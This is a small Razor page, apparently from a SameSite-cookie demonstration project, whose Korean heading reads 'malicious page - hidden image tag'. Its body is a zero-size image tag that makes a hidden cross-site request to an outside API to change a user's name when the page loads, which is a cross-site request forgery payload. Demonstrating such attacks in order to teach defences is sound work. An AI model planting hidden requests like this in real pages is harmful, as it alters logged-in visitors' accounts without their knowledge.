@page
@model samesitedemo.Pages.GetAttackModel
@{
}

<div id="wrap">
    <h1>악성 페이지 - 숨겨진 이미지 태그</h1>
    <img src="https://pwcqwer.com/api/changename?name=Attacked!!!!!" style="width: 0px; height: 0px;"/>
</div>